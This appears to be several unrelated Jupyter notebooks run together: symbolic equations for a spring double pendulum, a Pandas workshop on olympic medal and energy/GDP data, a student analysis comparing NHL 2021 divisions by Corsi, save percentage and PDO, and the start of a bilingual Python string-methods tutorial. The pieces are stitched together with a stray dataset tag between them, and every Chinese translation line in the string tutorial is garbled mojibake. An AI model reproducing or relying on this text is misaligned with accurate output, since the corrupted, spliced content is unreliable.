ddr0 = (2*(-6*m0*m1*(3*g*sin(theta1)-3*dtheta0^2*r0*sin(theta0-theta1)+6*dtheta0*dr0*cos(theta0-theta1)+4*dtheta1*dr1)*sin(theta0-theta1)-3*m1*(3*g*m0*sin(theta0)+6*g*m1*sin(theta0)+4*m0*dtheta0*dr0+12*m1*dtheta0*dr0+3*m1*dtheta1^2*r1*sin(theta0-theta1)+6*m1*dtheta1*dr1*cos(theta0-theta1))*sin(theta0-theta1)*cos(theta0-theta1)+(8*m0+6*m1)*(3*g*m1*cos(theta1)+6*k1*l1-6*k1*r1+3*m1*dtheta0^2*r0*cos(theta0-theta1)+6*m1*dtheta0*dr0*sin(theta0-theta1)+2*m1*dtheta1^2*r1)*cos(theta0-theta1)-(4*m0-12*m1*sin^2(theta0-theta1)-9*m1*cos^2(theta0-theta1)+12*m1)*(3*g*m0*cos(theta0)+6*g*m1*cos(theta0)+6*k0*l0-6*k0*r0+2*m0*dtheta0^2*r0+6*m1*dtheta0^2*r0+3*m1*dtheta1^2*r1*cos(theta0-theta1)-6*m1*dtheta1*dr1*sin(theta0-theta1))))/(3*m0*(-4*m0+2*m1*sin(theta0)*sin(theta1)*cos(theta0-theta1)+m1*cos^2(theta0)+m1*cos^2(theta1)-5*m1));
ddr1 = (2*(3*m0*m1^2*(3*g*sin(theta1)-3*dtheta0^2*r0*sin(theta0-theta1)+6*dtheta0*dr0*cos(theta0-theta1)+4*dtheta1*dr1)*sin(theta0-theta1)*cos(theta0-theta1)+6*m1*(m0+m1)*(3*g*m0*sin(theta0)+6*g*m1*sin(theta0)+4*m0*dtheta0*dr0+12*m1*dtheta0*dr0+3*m1*dtheta1^2*r1*sin(theta0-theta1)+6*m1*dtheta1*dr1*cos(theta0-theta1))*sin(theta0-theta1)+2*m1*(4*m0+3*m1)*(3*g*m0*cos(theta0)+6*g*m1*cos(theta0)+6*k0*l0-6*k0*r0+2*m0*dtheta0^2*r0+6*m1*dtheta0^2*r0+3*m1*dtheta1^2*r1*cos(theta0-theta1)-6*m1*dtheta1*dr1*sin(theta0-theta1))*cos(theta0-theta1)+(12*m1*(m0+3*m1)*sin^2(theta0-theta1)+9*m1*(m0+4*m1)*cos^2(theta0-theta1)-4*(m0+3*m1)*(m0+4*m1))*(3*g*m1*cos(theta1)+6*k1*l1-6*k1*r1+3*m1*dtheta0^2*r0*cos(theta0-theta1)+6*m1*dtheta0*dr0*sin(theta0-theta1)+2*m1*dtheta1^2*r1)))/(3*m0*m1*(-4*m0+2*m1*sin(theta0)*sin(theta1)*cos(theta0-theta1)+m1*cos^2(theta0)+m1*cos^2(theta1)-5*m1));
ddtheta0 = (-3*m0*m1*(3*g*sin(theta1)-3*dtheta0^2*r0*sin(theta0-theta1)+6*dtheta0*dr0*cos(theta0-theta1)+4*dtheta1*dr1)*cos(theta0-theta1)+2*m1*(3*g*m0*cos(theta0)+6*g*m1*cos(theta0)+6*k0*l0-6*k0*r0+2*m0*dtheta0^2*r0+6*m1*dtheta0^2*r0+3*m1*dtheta1^2*r1*cos(theta0-theta1)-6*m1*dtheta1*dr1*sin(theta0-theta1))*sin(theta0-theta1)*cos(theta0-theta1)-4*(m0+m1)*(3*g*m1*cos(theta1)+6*k1*l1-6*k1*r1+3*m1*dtheta0^2*r0*cos(theta0-theta1)+6*m1*dtheta0*dr0*sin(theta0-theta1)+2*m1*dtheta1^2*r1)*sin(theta0-theta1)+2*(m0-3*m1*sin^2(theta0-theta1)-4*m1*cos^2(theta0-theta1)+4*m1)*(3*g*m0*sin(theta0)+6*g*m1*sin(theta0)+4*m0*dtheta0*dr0+12*m1*dtheta0*dr0+3*m1*dtheta1^2*r1*sin(theta0-theta1)+6*m1*dtheta1*dr1*cos(theta0-theta1)))/(m0*(-4*m0+2*m1*sin(theta0)*sin(theta1)*cos(theta0-theta1)+m1*cos^2(theta0)+m1*cos^2(theta1)-5*m1)*r0);
ddtheta1 = (-3*m0*(3*g*m0*sin(theta0)+6*g*m1*sin(theta0)+4*m0*dtheta0*dr0+12*m1*dtheta0*dr0+3*m1*dtheta1^2*r1*sin(theta0-theta1)+6*m1*dtheta1*dr1*cos(theta0-theta1))*cos(theta0-theta1)-2*m0*(3*g*m1*cos(theta1)+6*k1*l1-6*k1*r1+3*m1*dtheta0^2*r0*cos(theta0-theta1)+6*m1*dtheta0*dr0*sin(theta0-theta1)+2*m1*dtheta1^2*r1)*sin(theta0-theta1)*cos(theta0-theta1)+4*m0*(3*g*m0*cos(theta0)+6*g*m1*cos(theta0)+6*k0*l0-6*k0*r0+2*m0*dtheta0^2*r0+6*m1*dtheta0^2*r0+3*m1*dtheta1^2*r1*cos(theta0-theta1)-6*m1*dtheta1*dr1*sin(theta0-theta1))*sin(theta0-theta1)-2*(4*m1*(m0+3*m1)*cos^2(theta0-theta1)+3*m1*(m0+4*m1)*sin^2(theta0-theta1)-(m0+3*m1)*(m0+4*m1))*(3*g*sin(theta1)-3*dtheta0^2*r0*sin(theta0-theta1)+6*dtheta0*dr0*cos(theta0-theta1)+4*dtheta1*dr1))/(m0*(-4*m0+2*m1*sin(theta0)*sin(theta1)*cos(theta0-theta1)+m1*cos^2(theta0)+m1*cos^2(theta1)-5*m1)*r1);
```
# Pandas Workshop
In the following workshop you will work with the files mentioned in each exercise. Make sure they are in the same folder as this document.
This workshop is based on the course __Introduction to Data Science in Python__ from the University of Michigan.
## Part 1
Import the olympics.csv file. Make sure it ends up in the appropriate format.
### Question 1
Which country has won the most gold medals in the Summer Games?
### Question 2
Which country has the biggest difference between its Summer and Winter gold medal counts?
### Question 3
Which country has the biggest difference between its Summer gold medal count and its Winter gold medal count relative to its total gold medal count?
$$\frac{Summer~Gold - Winter~Gold}{Total~Gold}$$
Only include countries that have won at least 1 gold medal in both Summer and Winter.
### Question 4
Write a function that creates a series called "Points", a weighted value where each gold medal (`Gold.2`) counts for 3 points, each silver medal (`Silver.2`) for 2 points and each bronze medal (`Bronce.2`) for 1 point. The function should return only the column it created (a Series object), with the country names as the index.
*This function should return a series named `Points` of length 146.*
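One possible starting point for Question 4 (a sketch, assuming the olympics DataFrame is called `df` and that the combined-medal columns are named `Gold.2`, `Silver.2` and `Bronze.2`; the bronze column is written `Bronce.2` above, so adjust to whatever your file actually uses):
```
def answer_points(df):
    # Weighted medal score: gold = 3, silver = 2, bronze = 1 point
    points = df['Gold.2'] * 3 + df['Silver.2'] * 2 + df['Bronze.2'] * 1
    points.name = 'Points'
    return points
```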
## Part 2
### Question 1
Load the energy data from the file Energy Indicators.xls, which is a list of indicators of energy supply and renewable electricity production from the United Nations for the year 2013, and place it in a DataFrame with the variable name energy.
Note that this is an Excel file, not a comma-separated values file. Also make sure to exclude the header and footer information from the data file. The first two columns are unnecessary, so get rid of them, and change the column labels so that the columns are:
['Country', 'Energy Supply', 'Energy Supply per Capita', '% Renewable']
Convert Energy Supply to gigajoules (there are 1,000,000 gigajoules in a petajoule). For all countries with missing data (for example, data given as "...") make sure this is reflected as np.NaN values.
Rename the following list of countries (for use in later questions):
"Republic of Korea": "South Korea",
"United States of America": "United States",
"United Kingdom of Great Britain and Northern Ireland": "United Kingdom",
"China, Hong Kong Special Administrative Region": "Hong Kong"
There are also several countries with numbers and/or parentheses in their names. Make sure to remove these,
e.g.
'Bolivia (Plurinational State of)' should be 'Bolivia',
'Switzerland17' should be 'Switzerland'.
Next, load the GDP data from the file world_bank.csv, which is a csv containing countries' GDP from 1960 to 2015 from the World Bank. Call this DataFrame GDP.
Make sure to skip the header, and rename the following list of countries:
"Republic of Korea": "South Korea",
"Iran, Islamic Republic": "Iran",
"Hong Kong SAR, China": "Hong Kong"
Finally, load the Scimago Journal and Country Rank data for Energy Engineering and Power Technology from the file scimagojr-3.xlsx, which ranks countries based on their journal contributions in the area mentioned above. Call this DataFrame ScimEn.
Join the three datasets GDP, Energy, and ScimEn into a new dataset (using the intersection of country names). Use only the GDP data from the last 10 years (2006-2015) and only the top 15 countries according to the Scimagojr 'Rank' (Rank 1 through 15).
The index of this DataFrame should be the country name, and the columns should be
['Rank', 'Documents', 'Citable documents', 'Citations', 'Self-citations', 'Citations per document', 'H index', 'Energy Supply', 'Energy Supply per Capita', '% Renewable', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015'].
```
energy = pd.read_excel('Energy Indicators.xls')  # starting point; still needs skiprows/skipfooter, column selection and renaming as described above
```
### Question 2
The previous question joined three datasets and then reduced the result to only the top 15 entries. When you joined the datasets, but before reducing them to the top 15 entries, how many entries did you lose?
### Question 3
What is the average GDP over the last 10 years for each country? (Exclude missing values from this calculation.)
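One possible approach (a sketch, assuming the merged top-15 DataFrame from Question 1 of this part is called `Top15` and the GDP values sit in string columns '2006' through '2015'):
```
def avg_gdp(Top15):
    years = [str(y) for y in range(2006, 2016)]
    # Row-wise mean over the 10 GDP columns; mean() skips NaN by default
    return Top15[years].mean(axis=1).sort_values(ascending=False)
```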
# Kyle Burt
## 4 New NHL Divisions Due to Covid-19 and Their Performance
The NHL was forced to create 4 divisions to geographically split up the teams. The North Division, made up of all the Canadian teams, was seen as the "weakest" division. I want to put this to the test by comparing the North Division's stats, described below, against the other three American divisions, which were seen as the "stronger" divisions. This will help clarify whether the Covid-19 divisions affected outcomes in the NHL.
- See if the North Division's stats were lower or higher than the rest of the divisions to determine whether it really was "weak".
# Milestone 3
```
import pandas as pd
data = pd.read_csv("../data/raw/Games - Natural Stat TrickTeam Season Totals - Natural Stat Trick.csv")
data
```
## Task 1: Conduct a EDA
```
import numpy as np
import matplotlib.pylab as plt
import seaborn as sns
print(f"There are {data.shape} rows and columns in the data")
print(f"The columns in the data set are: {data.columns}")
data.describe().T
data.describe(include = 'object').T
hist= data.hist(bins=10, figsize=(10,10))
boxplot = data.boxplot(grid=False, vert=False,fontsize=15)
plt.figure(figsize=(14,12))
sns.heatmap(data.corr(),linewidths=.1,cmap="YlGnBu", annot=True)
plt.yticks(rotation=0);
```
## Task 2: Analysis Pipeline
```
df = data.drop(columns = ['CF', 'CA' , 'SCF' , 'SCA' , 'Unnamed: 2'])
df
```
## Data Cleaning Notes
- I decided to drop the columns CF, CA, SCF, SCA, and Unnamed: 2, since many of the stats are already combined into percentages, which are more useful here.
- I ran a quick value count to make sure that I had the correct teams in each division and that they each played 56 regular-season games (31 teams x 56 games = 1736 rows).
- I later decided to drop the team names and add a new column with the division name, so I can compare data based on divisional play rather than team play, which is not useful for my research question.
# North Division
```
northdiv1 = df.drop(data[data.Team.isin([ "Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes", "Columbus Blue Jackets",
"Chicago Blackhawks", "Colorado Avalanche", "Dallas Stars", "Detroit Red Wings", "Florida Panthers",
"Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "Pittsburgh Penguins", "San Jose Sharks", "Tampa Bay Lightning",
"St Louis Blues", "Vegas Golden Knights", "New Jersey Devils", "New York Islanders", "New York Rangers", "Philadelphia Flyers",
"Washington Capitals", "Anaheim Ducks"])].index)
northdiv = northdiv1.reset_index()
print(northdiv['Team'].value_counts())
northdiv = northdiv.drop(columns = ['Team', 'index'])
northdiv['Division']='North'
```
## Steps for North Division
- Dropped all teams that were not in the North Division (Calgary, Edmonton, Montreal, Toronto, Winnipeg, Ottawa, Vancouver); a more direct `isin`-based alternative is sketched after this list.
- Reset the index and ran a value count on 'Team' to make sure that the correct teams were in the division I have created and they each played 56 games.
- Dropped the columns team and index as I am looking at the division not each team in a division.
- Added a new column 'Division' equal to North to be able to use just the North stats.
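A more direct way to build the same subset (a sketch that keeps the seven North-division teams with `isin` instead of dropping all the others):
```
north_teams = ["Calgary Flames", "Edmonton Oilers", "Montreal Canadiens", "Ottawa Senators",
               "Toronto Maple Leafs", "Vancouver Canucks", "Winnipeg Jets"]
northdiv_alt = (df[df["Team"].isin(north_teams)]   # keep only the seven North-division teams
                .drop(columns="Team")
                .assign(Division="North")
                .reset_index(drop=True))
```
The same pattern works for the other three divisions.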
# East Division
```
eastdiv1 = df.drop(data[data.Team.isin(["Arizona Coyotes", "Carolina Hurricanes", "Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Colorado Avalanche",
"Dallas Stars", "Detroit Red Wings", "Florida Panthers", "Los Angeles Kings", "Minnesota Wild", "Nashville Predators", "San Jose Sharks",
"Tampa Bay Lightning", "St Louis Blues", "Vegas Golden Knights", "Edmonton Oilers", "Montreal Canadiens","Ottawa Senators",
"Toronto Maple Leafs", "Winnipeg Jets", "Anaheim Ducks", "Vancouver Canucks",])].index)
eastdiv = eastdiv1.reset_index()
print(eastdiv['Team'].value_counts())
eastdiv = eastdiv.drop(columns = ['Team', 'index'])
eastdiv['Division']='East'
```
## Steps for East Division
- Dropped all teams that were not in the East division (Pittsburgh, Washington, Boston, NY Islanders, NY Rangers, Philadelphia, New Jersey, Buffalo).
- Reset the index and ran a value count on 'Team' to make sure that the correct teams were in the division I have created and they each played 56 games.
- Dropped the columns team and index as I am looking at the division not each team in a division.
- Added a new column 'Division' equal to East to be able to use just the East stats.
# Central Division
```
centdiv1 = df.drop(data[data.Team.isin(["Arizona Coyotes", "Buffalo Sabres", "Boston Bruins", "Calgary Flames","Colorado Avalanche"
,"Los Angeles Kings", "Minnesota Wild","Pittsburgh Penguins", "San Jose Sharks", "St Louis Blues", "Vegas Golden Knights",
"Edmonton Oilers", "Montreal Canadiens", "New Jersey Devils", "New York Islanders",
"New York Rangers", "Ottawa Senators", "Philadelphia Flyers", "Toronto Maple Leafs",
"Winnipeg Jets", "Washington Capitals", "Anaheim Ducks", "Vancouver Canucks"])].index)
centdiv = centdiv1.reset_index()
print(centdiv['Team'].value_counts())
centdiv = centdiv.drop(columns = ['Team', 'index'])
centdiv['Division']='Central'
```
## Steps for Central Division
- Dropped all teams that were not in the Central division (Carolina, Florida, Tampa Bay, Nashville, Dallas, Chicago, Detroit, Columbus).
- Reset the index and ran a value count on 'Team' to make sure that the correct teams were in the division I have created and they each played 56 games.
- Dropped the columns team and index as I am looking at the division not each team in a division.
- Added a new column 'Division' equal to Central to be able to use just the Central stats.
# West Division
```
westdiv1= df.drop(data[data.Team.isin(["Buffalo Sabres", "Boston Bruins", "Carolina Hurricanes",
"Columbus Blue Jackets", "Calgary Flames", "Chicago Blackhawks", "Dallas Stars", "Detroit Red Wings", "Florida Panthers",
"Nashville Predators", "Pittsburgh Penguins","Tampa Bay Lightning","Edmonton Oilers", "Montreal Canadiens",
"New Jersey Devils", "New York Islanders", "New York Rangers", "Ottawa Senators",
"Philadelphia Flyers", "Toronto Maple Leafs", "Winnipeg Jets", "Washington Capitals","Vancouver Canucks"])].index)
westdiv= westdiv1.reset_index()
print(westdiv['Team'].value_counts())
westdiv= westdiv.drop(columns = ['Team','index'])
westdiv['Division']='West'
```
## Steps for West Division
- Dropped all teams that were not in the West division (Colorado, Vegas, Minnesota, St. Louis, Arizona, Los Angeles, San Jose, Anaheim).
- Reset the index and ran a value count on 'Team' to make sure that the correct teams were in the division I have created and they each played 56 games.
- Dropped the columns team and index as I am looking at the division not each team in a division.
- Added a new column 'Division' equal to West to be able to use just the West stats.
# All Divisions (concatenating all cleaned divisions into one)
```
data_frames = [northdiv, centdiv, eastdiv, westdiv]
alldivisions = pd.concat([northdiv, centdiv, eastdiv,westdiv], axis=0)
alldivisions
```
# Task 3 Method Chaining and Python Programs
```
import project_functions2 as kp
dfp= kp.load_and_process(path_to_csv_file = "../data/raw/Games - Natural Stat TrickTeam Season Totals - Natural Stat Trick.csv")
dfp
NorthDiv = kp.North_Div1(dfp)
CentDiv = kp.Cent_Div1(dfp)
WestDiv = kp.West_Div1(dfp)
EastDiv = kp.East_Div1(dfp)
AllDiv = kp.all_divisions_describe(dfp)
```
# Task 4
## Data Analysis:
```
print("Number of rows and columns respectively:", dfp.shape)
print("Columns in the dataset:", dfp.columns)
kp.all_divisions_describe(dfp)
```
# Divisional Corsi (CF%)
```
df = kp.all_divisions_describe(dfp)
(sns.violinplot(x="CF%", y="Division", data=df)).set_title("Divisions Corsi %")
```
# Results:
## Corsi % (CF%) for a team takes the number of shot attempts by the team and divides it by the total number of shot attempts by both the team and its opponent. This accounts for shots on goal, missed shots and blocked shots over shots against, missed shots against and blocked shots against. It is a great stat for a team's puck possession, which can predict future success as well as who is dominating the game. An average Corsi % is around 50%.
- The means are all nearly identical, but when we look at the shape, the North Division stands out.
- All other divisions have a normal-looking distribution with similar outliers. Their normal shape shows they had a higher probability of posting a Corsi % of around 50 and a lower probability of posting one much lower or higher than 50.
- The North Division has a greater range with more outliers, including some very high and some very low CF% games. The shape of its distribution is not normal: it peaks and then flattens out, staying almost constant between a Corsi % of 40 and 60, meaning its probability of posting a CF% anywhere in that range was almost identical. This is helpful because it shows that the North Division was inconsistent: some games they played great, with a Corsi % around 55-60%, while in other games they had no control of the game, with a Corsi % between 40-45%. Judging by shape alone, the skew between divisions is not major, but hockey is a game of split-second decisions and the North Division struggled to play consistently.
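As a quick numeric check of the CF% definition above (a sketch, assuming the raw `CF` and `CA` shot-attempt columns from the original file, which were dropped earlier in this notebook):
```
import pandas as pd
raw = pd.read_csv("../data/raw/Games - Natural Stat TrickTeam Season Totals - Natural Stat Trick.csv")
# Corsi For % = shot attempts for / (shot attempts for + shot attempts against)
cf_check = 100 * raw["CF"] / (raw["CF"] + raw["CA"])
print(cf_check.describe())  # should line up with the CF% column
```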
# Divisional Scoring Chances For Percentage (SCF%)
```
sns.set(style="darkgrid")
df = kp.North_Div1(dfp)
df1 = kp.West_Div1(dfp)
df2 = kp.East_Div1(dfp)
df3 = kp.Cent_Div1(dfp)
# Maybe dont do a histogram as it is confusing with all of the bars.
sns.histplot(data=df, x="SCF%", color="red", label="North Div", kde=True)
sns.histplot(data=df1, x="SCF%", color="green", label="West Div", kde=True)
sns.histplot(data=df2, x="SCF%", color="blue", label="East Div", kde=True)
sns.histplot(data=df3, x="SCF%", color="yellow", label="Central Div", kde=True)
plt.title('Divisions SCF%')
plt.legend()
plt.show()
```
# Results:
## Scoring Chances For Percentage (SCF%) is the number of real scoring chances a team has over the course of the game. It takes Corsi events and subtracts any shot attempt from outside a team's offensive zone.
- From the histogram comparing all divisions' SCF% we can see a few interesting things. First, the North Division (red) and the Central Division (yellow) both have a dip when their SCF% was around 50% and peak around 40% and 60%. Not only are they the lowest on the graph near 50%, meaning they had fewer games with an SCF% around 50%, but there is a drastic gap between them and the other divisions, which have a normal distribution. This shows that, compared to the other three divisions, the North Division was once again inconsistent: they had games with many scoring chances, but they also had games with relatively few. This helps show that the North Division was erratic when its teams played each other night after night. When we look at the East Division (blue), we can see that in their divisional play the teams were more consistent against each other, with the highest frequency around 50%.
# Divisional Save Percentage (SV%)
```
df4 = kp.North_Div1(dfp)
df5 = kp.West_Div1(dfp)
df6 = kp.East_Div1(dfp)
df7 = kp.Cent_Div1(dfp)
sns.kdeplot(data=df4, x="SV%", color = "orange", label="North Div", common_norm=False, alpha=0.9)
sns.kdeplot(data=df5, x="SV%", color = "green", label="West Div", common_norm=False, alpha=0.9)
sns.kdeplot(data=df6, x="SV%", color = "red",label="East Div",common_norm=False, alpha=0.9)
sns.kdeplot(data=df7, x="SV%", color = "blue" ,label="Central Div", common_norm=False, alpha=0.9)
plt.title('Divisions Save Percentage')
plt.legend()
plt.show()
```
# Results:
## Save Percentage (SV%) helps measure a team's defense and goaltending by looking at the share of shots on goal a goaltender saves.
- From the density plot above we can see that all the divisions have data skewed to the left, which is good, as you want your team's save percentage to be as close to 100% as possible, i.e. letting in 0 goals. The North Division has some of the worst save percentages, peaking around the 90% mark, while all other divisions peak around the mid-90s; the North Division also has a lower probability of achieving those save percentages. The Central Division had the best goaltending, as its probability of posting an SV% above 90% was high; the West and East Divisions show the same effect with a slightly lower probability. Thus the North Division's goaltending was struggling compared to the other divisions, showing that its teams were sloppy in the defensive zone and were also saving fewer shots than the other divisions.
# Divisional Time on Ice (TOI)
```
df1 = kp.all_divisions_describe(dfp)
sns.set_theme(style="white", rc={"axes.facecolor": (0, 0, 0, 0), 'axes.linewidth':2})
palette = sns.color_palette("Set2", 12)
g = sns.FacetGrid(df1, palette=palette, row="Division",hue = "Division", aspect=9, height=1.2)
g.map_dataframe(sns.kdeplot, x="TOI", fill=True, alpha=1)
g.map_dataframe(sns.kdeplot, x="TOI", color='black')
def label(x, color, label):
ax = plt.gca()
ax.text(0, .2, label, color='Black', fontsize=13,
ha="left", va="center", transform=ax.transAxes)
g.map(label, "Division")
g.fig.subplots_adjust(hspace=-.5)
g.set_titles("")
g.set(yticks=[], xlabel="Minutes ")
g.despine( left=True)
plt.suptitle('NHL Divisions - TOI', y=0.98)
```
# Results:
## Time on Ice (TOI) is a division's total time on ice at 5v5, regular-strength play. It helps show how disciplined a division was overall at staying out of the penalty box.
- The ridgeline plot gives some interesting results. Looking at the North Division, the peak sits just before 50 minutes, with a dip before it around 40 minutes of time on ice. The dip shows the North spent less time in 5v5 play, and the peak just before 50 minutes shows they played less disciplined hockey, with more power-play and penalty-kill time. All other divisions peak just after 50 minutes, with the density increasing up to their average time on ice. This shows that in the other divisions teams played more disciplined hockey, took fewer penalties, and spent more time at 5v5. This translates into a division's overall performance, as more 5v5 time lets star players be on the ice and help their team offensively and defensively. The North Division was struggling to increase its minutes of 5-on-5 hockey, which hurt its performance relative to the other divisions.
# Divisional Shooting Percentage (SH%)
```
dfn = kp.North_Div1(dfp)
dfw = kp.West_Div1(dfp)
dfe = kp.East_Div1(dfp)
dfc = kp.Cent_Div1(dfp)
fig, axs = plt.subplots(2, 2, figsize=(10, 10))
sns.histplot(data=dfn, x="SH%", kde=True, color="blue",ax=axs[0, 0]).set(title='North Division')
sns.histplot(data=dfw, x="SH%", kde=True, color="purple",ax=axs[0, 1]).set(title='West Division')
sns.histplot(data=dfe, x="SH%", kde=True, color="red", ax=axs[1, 0]).set(title='East Division')
sns.histplot(data=dfc, x="SH%", kde=True, color="green", ax=axs[1, 1]).set(title='Central Division')
plt.show()
```
# Results:
## Shooting Percentage (SH%) measures how often a team's shots on goal result in a goal. This is useful as it shows a division's ability to score, and scoring the most goals wins the game.
- When we compare each division's histogram, we have to look at the SH% and the count. The count shows how many times a value falls within each bin of SH% values. The North Division's data has a high count at relatively low SH% and a decreasing count as SH% increases above 8-10%. This tells us the North Division was scoring less with each shot on goal, and even at its peak the count was only around 50. Comparing this to the other divisions, we still see the same relationship between count and SH%, but the difference is where the peaks are: at similar SH% values the other divisions have a much higher count, meaning that over the course of the season they were scoring more than the North Division. This is an indication that the North Division was weaker, since it was not able to score as many goals.
# Divisional PDO (Luck)
```
dfn = kp.North_Div1(dfp)
dfw = kp.West_Div1(dfp)
dfe = kp.East_Div1(dfp)
dfc = kp.Cent_Div1(dfp)
fig, axs = plt.subplots(2, 2, figsize=(10, 10))
sns.histplot(data=dfn, x="PDO", kde=True, color="blue",ax=axs[0, 0]).set(title='North Division')
sns.histplot(data=dfw, x="PDO", kde=True, color="purple",ax=axs[0, 1]).set(title='West Division')
sns.histplot(data=dfe, x="PDO", kde=True, color="red", ax=axs[1, 0]).set(title='East Division')
sns.histplot(data=dfc, x="PDO", kde=True, color="green", ax=axs[1, 1]).set(title='Central Division')
plt.show()
```
# Results:
## PDO is a division's shooting percentage plus save percentage. Adding these two together gives a statistic that is essentially all luck ("puck luck").
- When comparing the divisions' PDO histograms, we can see that the North Division's PDO peaks at 1.0, which we expect, but what is interesting is the frequency/count and the shape around this value. The North Division has an almost perfect normal distribution, showing that in most games it averaged a PDO of 1.0, which is around the league-average PDO. Taken as a whole, the other divisions do not have this uniform shape: their counts are much higher across the range from 0.9 to 1.1. A PDO below 0.98 indicates that a division is likely better than it appears, while a PDO over 1.02 indicates that a division is not as good as it seems. This is where the North Division's consistency plays a good role: it played right around that sweet spot of luck, whereas the other divisions bounced back and forth, sometimes playing better than they should and sometimes worse.
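As a quick check of this definition (a sketch; `SH%` and `SV%` in this dataset are expressed as percentages, so they are divided by 100 here — verify against the scale of the `PDO` column in your file):
```
# PDO = shooting percentage + save percentage (as fractions); typically hovers around 1.0
pdo_check = alldivisions["SH%"] / 100 + alldivisions["SV%"] / 100
print(pdo_check.describe())
```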
# Final Results:
- From the above analysis we can see that the North Division struggled to play consistently in the stats that matter most to the outcome of a hockey game. This season is very interesting, and will most likely never happen again, since no Canadian teams played U.S. teams in the regular season. The analysis shows that the North Division struggled to stay out of the penalty box and played undisciplined hockey, which is one reason some divisions end up better than others. It is also striking that the North Division's stats did not have the expected shape (probability distribution) compared to the other divisions in terms of CF% and SCF%, yet had an almost perfect distribution for the PDO stat. Is it enough to say that the North Division was the weakest division? Yes, but the other divisions are all so close that I wouldn't say the North was dramatically the worst; I would, however, say that games in the North Division were played sloppily and that its teams need to re-evaluate some of the basics of what makes a team good. I am excited to make a Tableau dashboard to showcase my results.
```
#Creating a CSV
AllDiv.to_csv("AllDiv.csv", index=False)
```
|
github_jupyter
|
# String Manipulation and Regular Expressions
# ๅญ็ฌฆไธฒๆไฝๅๆญฃๅ่กจ่พพๅผ
> One place where the Python language really shines is in the manipulation of strings.
This section will cover some of Python's built-in string methods and formatting operations, before moving on to a quick guide to the extremely useful subject of *regular expressions*.
Such string manipulation patterns come up often in the context of data science work, and is one big perk of Python in this context.
Python่ฏญ่จๅฏนไบๅญ็ฌฆไธฒ็ๆไฝๆฏๅ
ถไธๅคงไบฎ็นใๆฌ็ซ ไผ่ฎจ่ฎบPython็ไธไบๅ
งๅปบ็ๅญ็ฌฆไธฒๆไฝๅๆ ผๅผๅๆนๆณใๅจ่ฟไนๅ๏ผๆไปฌไผ็ฎๅ่ฎจ่ฎบไธไธไธไธช้ๅธธๆ็จ็่ฏ้ข*ๆญฃๅ่กจ่พพๅผ*ใ่ฟ็ฑปๅญ็ฌฆไธฒ็ๆไฝ็ปๅธธไผๅจๆฐๆฎ็งๅญฆไธญๅบ็ฐ๏ผๅ ๆญคไนๆฏPythonไธญๅพ้่ฆ็ไธ่ใ
> Strings in Python can be defined using either single or double quotations (they are functionally equivalent):
Pythonไธญ็ๅญ็ฌฆไธฒๅฏไปฅไฝฟ็จๅๅผๅทๆๅๅผๅทๅฎไน๏ผๅฎไปฌ็ๅ่ฝๆฏไธ่ด็๏ผ๏ผ
```
x = 'a string'
y = "a string"
x == y
```
> In addition, it is possible to define multi-line strings using a triple-quote syntax:
้คๆญคไนๅค๏ผ่ฟๅฏไปฅไฝฟ็จ่ฟ็ปญ็ไธไธชๅผๅทๅฎไนๅค่ก็ๅญ็ฌฆไธฒ๏ผ
```
multiline = """
one
two
three
"""
```
> With this, let's take a quick tour of some of Python's string manipulation tools.
ๅฅฝไบ๏ผๆฅไธๆฅๆไปฌๆฅๅฟซ้็็ไธไธPython็ๅญ็ฌฆไธฒๆไฝๅทฅๅ
ทใ
## Simple String Manipulation in Python
## Python็็ฎๅๅญ็ฌฆไธฒๆไฝ
> For basic manipulation of strings, Python's built-in string methods can be extremely convenient.
If you have a background working in C or another low-level language, you will likely find the simplicity of Python's methods extremely refreshing.
We introduced Python's string type and a few of these methods earlier; here we'll dive a bit deeper
ๅฏนไบๅบๆฌ็ๅญ็ฌฆไธฒๆไฝๆฅ่ฏด๏ผPythonๅ
งๅปบ็ๅญ็ฌฆไธฒๆนๆณไฝฟ็จ่ตทๆฅ้ๅธธๆนไพฟใๅฆๆไฝ ๆๅจCๆๅ
ถไปๅบๅฑ่ฏญ่จ็็ผ็จ็ปๅ็่ฏ๏ผไฝ ไผๅ็ฐPython็ๅญ็ฌฆไธฒๆไฝ้ๅธธ็ฎๅใๆไปฌไนๅไป็ปไบPython็ๅญ็ฌฆไธฒ็ฑปๅๅไธไบๆนๆณ๏ผไธ้ขๆไปฌ็จๅพฎๆทฑๅ
ฅ็ไบ่งฃไธไธใ
### Formatting strings: Adjusting case
### ๆ ผๅผๅๅญ็ฌฆไธฒ๏ผ่ฝฌๆขๅคงๅฐๅ
> Python makes it quite easy to adjust the case of a string.
Here we'll look at the ``upper()``, ``lower()``, ``capitalize()``, ``title()``, and ``swapcase()`` methods, using the following messy string as an example:
Pythonๅฏนๅญ็ฌฆไธฒ่ฟ่กๅคงๅฐๅ่ฝฌๆข้ๅธธๅฎนๆใๆไปฌๅฐไผ็ๅฐ`upper()`๏ผ`lower()`๏ผ`capitalize()`๏ผ`title()`ๅ`swapcase()`ๆนๆณ๏ผไธ้ขๆไปฌ็จไธไธชๅคงๅฐๅๆททไนฑ็ๅญ็ฌฆไธฒไฝไธบไพๅญๆฅ่ฏดๆ๏ผ
```
fox = "tHe qUICk bROWn fOx."
```
> To convert the entire string into upper-case or lower-case, you can use the ``upper()`` or ``lower()`` methods respectively:
ๆณ่ฆๅฐๆดไธชๅญ็ฌฆไธฒ่ฝฌไธบๅคงๅๆ่
ๅฐๅ๏ผไฝฟ็จ`upper()`ๆ่
`lower()`ๆนๆณ๏ผ
```
fox.upper()
fox.lower()
```
> A common formatting need is to capitalize just the first letter of each word, or perhaps the first letter of each sentence.
This can be done with the ``title()`` and ``capitalize()`` methods:
่ฟๆไธไธชๅพๅธธ่ง็ๆ ผๅผๅ้ๆฑ๏ผๅฐๆฏไธชๅ่ฏ็้ฆๅญๆฏ็ผ็จๅคงๅ๏ผๆ่
ๆฏไธชๅฅๅญ็้ฆๅญๆฏๅไธบๅคงๅใๅฏไปฅไฝฟ็จ`title()`ๅ`capitalize()`ๆนๆณ๏ผ
```
fox.title()
fox.capitalize()
```
> The cases can be swapped using the ``swapcase()`` method:
ๅฏไปฅไฝฟ็จ`swapcase()`ๆนๆณๅๆขๅคงๅฐๅ๏ผ
```
fox.swapcase()
```
### Formatting strings: Adding and removing spaces
